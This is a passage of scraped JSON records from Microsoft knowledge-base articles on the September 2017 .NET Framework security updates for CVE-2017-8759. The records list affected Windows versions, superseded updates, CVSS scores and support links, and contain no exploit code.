Windows Server 2008 R2 SP1 and Windows Server 2008 SP2: September 12, 2017</li><li><a data-content-id=\"4040980\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040980</a>\u00a0Description of the Security and Quality Rollup for the .NET Framework 3.5.1 for Windows 7 SP1 and Windows Server 2008 R2 SP1: September 12, 2017</li></ul><h3>Update replacement information</h3><p><span><span><span>This update replaces updates <a href=\"https://support.microsoft.com/help/2978120\"><u>2978120</u></a>, and <a href=\"https://support.microsoft.com/help/2978128\"><u>2978128</u></a>.</span></span></span></p><h2>How to obtain help and support for this security update</h2><ul><li><span>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"_blank\">Windows Update FAQ</a></span></li><li><span>Security solutions for IT professionals: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"_blank\">TechNet Security Support and Troubleshooting</a></li><li><span>Help for protecting your Windows-based products and services from viruses and malware: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"_blank\">Microsoft Secure</a></li><li><span>Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"_blank\">International Support</a></span></li></ul><h2>Applies to</h2><div><span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014661954_27226468495375755\">\ufeff</span><a id=\"appliestoproducts\" name=\"appliestoproducts\"></a>This article applies to the following:</span><br/>\u00a0</div><ul><li>Microsoft .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7 when used with:<ul><li>Windows Server 2008 R2 Service Pack 1</li><li>Windows 7 Service Pack 1</li></ul></li></ul></body></html>", "edition": 8, "modified": "2017-09-12T17:17:19", "id": "KB4041083", "href": "https://support.microsoft.com/en-us/help/4041083/", "published": "2017-09-12T00:00:00", "title": "Security and Quality Rollup for the .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7 for Windows 7 SP1 and Windows Server 2008 R2 SP1: September 12, 2017", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:42:00", "bulletinFamily": "microsoft", "cvelist": ["CVE-2017-8759"], "description": "<html><body><p>Resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when the Microsoft .NET Framework processes untrusted input.</p><h2></h2><div class=\"kb-summary-section section\"><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600600_09450835418803427\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_1781047559935547\">\ufeff</span><a bookmark-id=\"appliestoproducts\" data-content-id=\"\" data-content-type=\"\" href=\"#appliestoproducts\" managed-link=\"\" target=\"\">View products that this article applies to.</a><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_7626286965278781\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600599_5976545847215549\">\ufeff</span><br/></div><h2>Summary</h2><div class=\"kb-summary-section section\"><p>This security update resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploits\u00a0this vulnerability in software by using the .NET Framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts that have full user rights. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate with administrative user rights.</p><p>To exploit the vulnerability, an attacker would first have to convince the user to open a malicious document or application.</p><p>This security update addresses the vulnerability by correcting how the .NET Framework validates untrusted input.<span>\u00a0To learn more about this vulnerability, see </span><a href=\"https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2017-8759\" id=\"kb-link-2\" target=\"_self\">Microsoft Common Vulnerabilities and Exposures CVE-2017-8759</a><span>.</span></p></div><h2></h2><p><span class=\"text-base\">Important</span></p><ul><li><span><span><span>All updates for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2 require update <a href=\"https://support.microsoft.com/en-us/help/2919355\" target=\"_self\"><span><span><span>2919355</span></span></span></a> to be installed. We recommend that you install update <a href=\"https://support.microsoft.com/en-us/help/2919355\" target=\"_self\"><span><span><span>2919355</span></span></span></a> on your Windows RT 8.1-based, Windows 8.1-based, or Windows Server 2012 R2-based computer so that you receive updates in the future</span></span></span>.</li><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>.</li></ul><h3><span>Update replacement information</span></h3><p><span><span><span>This update replaces updates <a href=\"https://support.microsoft.com/help/2978122\"><u>2978122</u></a>, and <a href=\"https://support.microsoft.com/help/2978126\"><u>2978126</u></a>.</span></span></span></p><h2>Additional information about this security update</h2><div><span>The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information.</span></div><div>\u00a0</div><ul><li><span><a data-content-id=\"4040972\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040972</a>\u00a0Description of the Security and Quality Rollup for the .NET Framework 4.6, 4.6.1, 4.6.2, and 4.7 for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2: September 12, 2017</span></li><li><a data-content-id=\"4040974\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040974</a>\u00a0Description of the Security and Quality Rollup for the .NET Framework 4.5.2 for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2: September 12, 2017</li><li><a data-content-id=\"4040981\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040981</a>\u00a0Description of the Security and Quality Rollup for the .NET Framework 3.5 for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2: September 12, 2017</li></ul><h2>How to obtain help and support for this security update</h2><ul><li><span>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"_blank\">Windows Update FAQ</a></span></li><li><span>Security solutions for IT professionals: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"_blank\">TechNet Security Support and Troubleshooting</a></li><li><span>Help for protecting your Windows-based products and services from viruses and malware: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"_blank\">Microsoft Secure</a></li><li><span>Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"_blank\">International Support</a></span></li></ul><h2>Applies to</h2><div><span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014661954_27226468495375755\">\ufeff</span><a id=\"appliestoproducts\" name=\"appliestoproducts\"></a>This article applies to the following:</span><br/>\u00a0</div><ul><li>Microsoft .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7 when used with:<ul><li>Windows Server 2012 R2</li><li>Windows RT 8.1</li><li>Windows 8.1</li></ul></li></ul></body></html>", "edition": 7, "modified": "2017-09-12T17:17:19", "id": "KB4041085", "href": "https://support.microsoft.com/en-us/help/4041085/", "published": "2017-09-12T00:00:00", "title": "Security and Quality Rollup for the .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7 for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2: September 12, 2017", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:49:05", "bulletinFamily": "microsoft", "cvelist": ["CVE-2017-8759"], "description": "<html><body><p>Resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when the .NET Framework processes untrusted input.</p><h2></h2><div class=\"kb-summary-section section\"><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600600_09450835418803427\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_1781047559935547\">\ufeff</span><a bookmark-id=\"appliestoproducts\" data-content-id=\"\" data-content-type=\"\" href=\"#appliestoproducts\" managed-link=\"\" target=\"\">View products that this article applies to.</a><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_7626286965278781\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600599_5976545847215549\">\ufeff</span><br/></div><h2>Summary</h2><p>This security update resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploits\u00a0this vulnerability in software by using the .NET Framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts that have full user rights. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate by using administrative user rights.</p><p>To exploit the vulnerability, an attacker must first convince the user to open a malicious document or application.</p><p><span><span><span>This security update addresses the vulnerability by correcting how the .NET Framework validates untrusted input</span></span></span>. To learn more about this vulnerability, see <a href=\"https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2017-8759\" id=\"kb-link-2\" target=\"_self\">Microsoft Common Vulnerabilities and Exposures CVE-2017-8759</a>.</p><h2></h2><p><span class=\"text-base\">Important</span></p><ul><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>.</li></ul><h3><span>Update replacement information</span></h3><p><span><span><span>This update replaces updates <a href=\"https://support.microsoft.com/help/2978121\"><u>2978121</u></a>, and <a href=\"https://support.microsoft.com/help/2978127\"><u>2978127</u></a>.</span></span></span></p><h2>Additional information about this security update</h2><div><span>The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information.</span></div><div>\u00a0</div><ul><li><span><a data-content-id=\"4040971\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040971</a>\u00a0Description of the Security and Quality Rollup for the .NET Framework 4.6, 4.6.1, 4.6.2, and 4.7 for Windows Server 2012: September 12, 2017</span></li><li><a data-content-id=\"4040975\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040975</a>\u00a0Description of the Security and Quality Rollup for the .NET Framework 4.5.2 for Windows Server 2012: September 12, 2017</li><li><a data-content-id=\"4040979\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040979</a>\u00a0Description of the Security and Quality Rollup for the .NET Framework 3.5 for Windows Server 2012: September 12, 2017</li></ul><h2>How to obtain help and support for this security update</h2><ul><li><span>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"_blank\">Windows Update FAQ</a></span></li><li><span>Security solutions for IT professionals: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"_blank\">TechNet Security Support and Troubleshooting</a></li><li><span>Help for protecting your Windows-based products and services from viruses and malware: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"_blank\">Microsoft Secure</a></li><li><span>Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"_blank\">International Support</a></span></li></ul><h2>Applies to</h2><div><span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014661954_27226468495375755\">\ufeff</span><a id=\"appliestoproducts\" name=\"appliestoproducts\"></a>This article applies to the following:</span><br/>\u00a0</div><ul><li>Microsoft .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7 when used with:<ul><li>Windows Server 2012</li></ul></li></ul></body></html>", "edition": 7, "modified": "2017-09-12T17:17:19", "id": "KB4041084", "href": "https://support.microsoft.com/en-us/help/4041084/", "published": "2017-09-12T00:00:00", "title": "Security and Quality Rollup for the .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7 for Windows Server 2012: September 12, 2017", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:38:39", "bulletinFamily": "microsoft", "cvelist": ["CVE-2017-8759"], "description": "<html><body><p>Resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when the .NET Framework processes untrusted input.</p><h2></h2><div class=\"kb-summary-section section\"><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600600_09450835418803427\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_1781047559935547\">\ufeff</span><a bookmark-id=\"appliestoproducts\" data-content-id=\"\" data-content-type=\"\" href=\"#appliestoproducts\" managed-link=\"\" target=\"\">View products that this article applies to.</a><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_7626286965278781\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600599_5976545847215549\">\ufeff</span><br/></div><h2>Summary</h2><p>This security update resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploits\u00a0this vulnerability in software by using the .NET Framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts that have full user rights. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate by using administrative user rights.</p><p>To exploit the vulnerability, an attacker must first convince the user to open a malicious document or application.</p><p><span><span><span>This security update addresses the vulnerability by correcting how the .NET Framework validates untrusted input</span></span></span>. To learn more about this vulnerability, see <a href=\"https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2017-8759\" id=\"kb-link-2\" target=\"_self\">Microsoft Common Vulnerabilities and Exposures CVE-2017-8759</a>.</p><h2></h2><p><span class=\"text-base\">Important</span></p><ul><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>.</li></ul><h3><span>Update replacement information</span></h3><p><span><span><span>This update replaces updates <a href=\"https://support.microsoft.com/help/2978122\"><u>2978122</u></a>, and <a href=\"https://support.microsoft.com/help/2978126\"><u>2978126</u></a>.</span></span></span></p><h2>Additional information about this security update</h2><div><span>The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information.</span></div><div>\u00a0</div><ul><li><span><a data-content-id=\"4040973\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040973</a>\u00a0Description of the Security and Quality Rollup for the .NET Framework 4.6, 4.6.1, 4.6.2, and 4.7 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and for the .NET Framework 4.6 for Windows Server 2008 SP2: September 12, 2017</span></li><li><a data-content-id=\"4040977\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040977</a>\u00a0Description of the Security and Quality Rollup for the .NET Framework 4.5.2 for Windows 7 SP1, Windows Server 2008 R2 SP1 and Windows Server 2008 SP2: September 12, 2017</li><li><a data-content-id=\"4040978\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040978</a>\u00a0Description of the Security and Quality Rollup for the .NET Framework 2.0 SP2 for Windows Server 2008 SP2: September 12, 2017</li></ul><h2>How to obtain help and support for this security update</h2><ul><li><span>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"_blank\">Windows Update FAQ</a></span></li><li><span>Security solutions for IT professionals: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"_blank\">TechNet Security Support and Troubleshooting</a></li><li><span>Help for protecting your Windows-based products and services from viruses and malware: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"_blank\">Microsoft Secure</a></li><li><span>Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"_blank\">International Support</a></span></li></ul><h2>Applies to</h2><div><span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014661954_27226468495375755\">\ufeff</span><a id=\"appliestoproducts\" name=\"appliestoproducts\"></a>This article applies to the following:</span><br/>\u00a0</div><ul><li>Microsoft .NET Framework 2.0 Service Pack 2, 4.5.2, and 4.6, when used with:<ul><li>Windows Server 2008 Service Pack 2</li></ul></li></ul></body></html>", "edition": 8, "modified": "2017-09-12T17:17:19", "id": "KB4041086", "href": "https://support.microsoft.com/en-us/help/4041086/", "published": "2017-09-12T00:00:00", "title": "Security and Quality Rollup for the .NET Framework 2.0 SP2, 4.5.2, and 4.6 for Windows Server 2008 SP2: September 12, 2017", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:49:10", "bulletinFamily": "microsoft", "cvelist": ["CVE-2017-8759"], "description": "<html><body><p>Resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when the .NET Framework processes untrusted input.</p><h2></h2><div class=\"kb-summary-section section\"><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600600_09450835418803427\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_1781047559935547\">\ufeff</span><a bookmark-id=\"appliestoproducts\" data-content-id=\"\" data-content-type=\"\" href=\"#appliestoproducts\" managed-link=\"\" target=\"\">View products that this article applies to.</a><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_7626286965278781\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600599_5976545847215549\">\ufeff</span><br/></div><h2>Summary</h2><p>This security update resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploits\u00a0this vulnerability in software by using the .NET Framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts that have full user rights. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate by using administrative user rights.</p><p>To exploit the vulnerability, an attacker must first convince the user to open a malicious document or application.</p><p><span><span><span>This security update addresses the vulnerability by correcting how the .NET Framework validates untrusted input</span></span></span>. To learn more about this vulnerability, see <a href=\"https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2017-8759\" id=\"kb-link-2\" target=\"_self\">Microsoft Common Vulnerabilities and Exposures CVE-2017-8759</a>.</p><h2></h2><p><span class=\"text-base\">Important</span></p><ul><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>.</li></ul><h3><span>Update replacement information</span></h3><p><span><span><span>This update replaces updates <a href=\"https://support.microsoft.com/help/4019112\"><u>4019112</u></a>, <a href=\"https://support.microsoft.com/help/4035036\"><u>4035036</u></a>, <a href=\"https://support.microsoft.com/help/4014981\"><u>4014981</u></a>, and <a href=\"https://support.microsoft.com/help/4032113\"><u>4032113</u></a>.</span></span></span></p><h2>Additional information about this security update</h2><div><span>The following articles contain additional information about this security\u00a0update as it relates to individual product versions.</span></div><div>\u00a0</div><ul><li><span><a data-content-id=\"4040957\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040957</a>\u00a0Description of the Security Only update for the .NET Framework 4.6, 4.6.1, 4.6.2, and 4.7 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and for the .NET Framework 4.6 for Windows Server 2008 SP2: September 12, 2017</span></li><li><a data-content-id=\"4040960\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040960</a>\u00a0Description of the Security Only update for the .NET Framework 4.5.2 for Windows 7 SP1, Windows Server 2008 R2 SP1 and Windows Server 2008 SP2: September 12, 2017</li><li><a data-content-id=\"4040966\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040966</a>\u00a0Description of the Security Only update for the .NET Framework 3.5.1 for Windows 7 SP1 and Windows Server 2008 R2 SP1: September 12, 2017</li></ul><h2>How to obtain help and support for this security update</h2><ul><li><span>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"_blank\">Windows Update FAQ</a></span></li><li><span>Security solutions for IT professionals: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"_blank\">TechNet Security Support and Troubleshooting</a></li><li><span>Help for protecting your Windows-based products and services from viruses and malware: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"_blank\">Microsoft Secure</a></li><li><span>Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"_blank\">International Support</a></span></li></ul><h2>Applies to</h2><div><span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014661954_27226468495375755\">\ufeff</span>This article applies to the following:</span></div><p>\u00a0</p><ul><li>Microsoft .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7 when used with:<ul><li>Windows Server 2008 R2 Service Pack 1</li><li>Windows 7 Service Pack 1</li></ul></li></ul><div>\u00a0</div></body></html>", "edition": 3, "modified": "2017-09-12T17:17:18", "id": "KB4041090", "href": "https://support.microsoft.com/en-us/help/4041090/", "published": "2017-09-12T00:00:00", "title": "Security Only update for the .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7 for Windows 7 SP1 and Windows Server 2008 R2 SP1: September 12, 2017", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:47:10", "bulletinFamily": "microsoft", "cvelist": ["CVE-2017-8759"], "description": "<html><body><p>Resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when the .NET Framework processes untrusted input.</p><h2></h2><div class=\"kb-summary-section section\"><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600600_09450835418803427\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_1781047559935547\">\ufeff</span><a bookmark-id=\"appliestoproducts\" data-content-id=\"\" data-content-type=\"\" href=\"#appliestoproducts\" managed-link=\"\" target=\"\">View products that this article applies to.</a><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_7626286965278781\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600599_5976545847215549\">\ufeff</span><br/></div><h2>Summary</h2><div class=\"kb-summary-section section\"><p>This security update resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploits\u00a0this vulnerability in software by using the .NET Framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts that have full user rights. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate by using administrative user rights.</p><p>To exploit the vulnerability, an attacker must first convince the user to open a malicious document or application.</p><span><span><span>This security update addresses the vulnerability by correcting how the .NET Framework validates untrusted input</span></span></span>. To learn more about this vulnerability, see <a href=\"https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2017-8759\" id=\"kb-link-2\" target=\"_self\">Microsoft Common Vulnerabilities and Exposures CVE-2017-8759</a>.</div><h2></h2><p><span class=\"text-base\">Important</span></p><ul><li><span><span><span>All updates for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2 require update <a href=\"https://support.microsoft.com/en-us/help/2919355\" target=\"_self\"><span><span><span>2919355</span></span></span></a> to be installed. We recommend that you install update <a href=\"https://support.microsoft.com/en-us/help/2919355\" target=\"_self\"><span><span><span>2919355</span></span></span></a> on your Windows RT 8.1-based, Windows 8.1-based, or Windows Server 2012 R2-based computer so that you receive updates in the future</span></span></span>.</li><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>.</li></ul><h3><span>Update replacement information</span></h3><p><span><span><span>This update replaces updates <a href=\"https://support.microsoft.com/help/4019114\"><u>4019114</u></a>, <a href=\"https://support.microsoft.com/help/4035038\"><u>4035038</u></a>, <a href=\"https://support.microsoft.com/help/4014983\"><u>4014983</u></a>, and <a href=\"https://support.microsoft.com/help/4032115\"><u>4032115</u></a>.</span></span></span></p><h2>Additional information about this security update</h2><div><span>The following articles contain additional information about this security\u00a0update as it relates to individual product versions.</span></div><div>\u00a0</div><ul><li><span><a data-content-id=\"4040956\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040956</a>\u00a0Description of the Security Only update for the .NET Framework 4.6, 4.6.1, 4.6.2, and 4.7 for Windows 8.1, Windows RT 8.1 and Windows Server 2012 R2: September 12, 2017</span></li><li><a data-content-id=\"4040958\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040958</a>\u00a0Description of the Security Only update for the .NET Framework 4.5.2 for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2: September 12, 2017</li><li><a data-content-id=\"4040967\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040967</a>\u00a0Description of the Security Only update for the .NET Framework 3.5 for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2: September 12, 2017</li></ul><h2>How to obtain help and support for this security update</h2><ul><li><span>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"_blank\">Windows Update FAQ</a></span></li><li><span>Security solutions for IT professionals: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"_blank\">TechNet Security Support and Troubleshooting</a></li><li><span>Help for protecting your Windows-based products and services from viruses and malware: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"_blank\">Microsoft Secure</a></li><li><span>Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"_blank\">International Support</a></span></li></ul><h2>Applies to</h2><div><span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014661954_27226468495375755\">\ufeff</span>This article applies to the following:</span></div><p>\u00a0</p><ul><li>Microsoft .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7 when used with:<ul><li>Windows Server 2012 R2</li><li>Windows RT 8.1</li><li>Windows 8.1</li></ul></li></ul><div>\u00a0</div></body></html>", "edition": 3, "modified": "2017-09-12T17:17:18", "id": "KB4041092", "href": "https://support.microsoft.com/en-us/help/4041092/", "published": "2017-09-12T00:00:00", "title": "Security Only update for the .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7 updates for Windows 8.1, Windows RT 8.1 and Windows Server 2012 R2: September 12, 2017", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:35:17", "bulletinFamily": "microsoft", "cvelist": ["CVE-2017-8759"], "description": "<html><body><p>Resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when the .NET Framework processes untrusted input.</p><h2></h2><div class=\"kb-summary-section section\"><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600600_09450835418803427\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_1781047559935547\">\ufeff</span><a bookmark-id=\"appliestoproducts\" data-content-id=\"\" data-content-type=\"\" href=\"#appliestoproducts\" managed-link=\"\" target=\"\">View products that this article applies to.</a><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_7626286965278781\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600599_5976545847215549\">\ufeff</span><br/></div><h2>Summary</h2><p>This security update resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploits\u00a0this vulnerability in software by using the .NET Framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts that have full user rights. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate by using administrative user rights.</p><p>To exploit the vulnerability, an attacker must first convince the user to open a malicious document or application.</p><p><span><span><span>This security update addresses the vulnerability by correcting how the .NET Framework validates untrusted input</span></span></span>. To learn more about this vulnerability, see <a href=\"https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2017-8759\" id=\"kb-link-2\" target=\"_self\">Microsoft Common Vulnerabilities and Exposures CVE-2017-8759</a>.</p><h2></h2><p><span class=\"text-base\">Important</span></p><ul><li>If you install a language pack after you install this 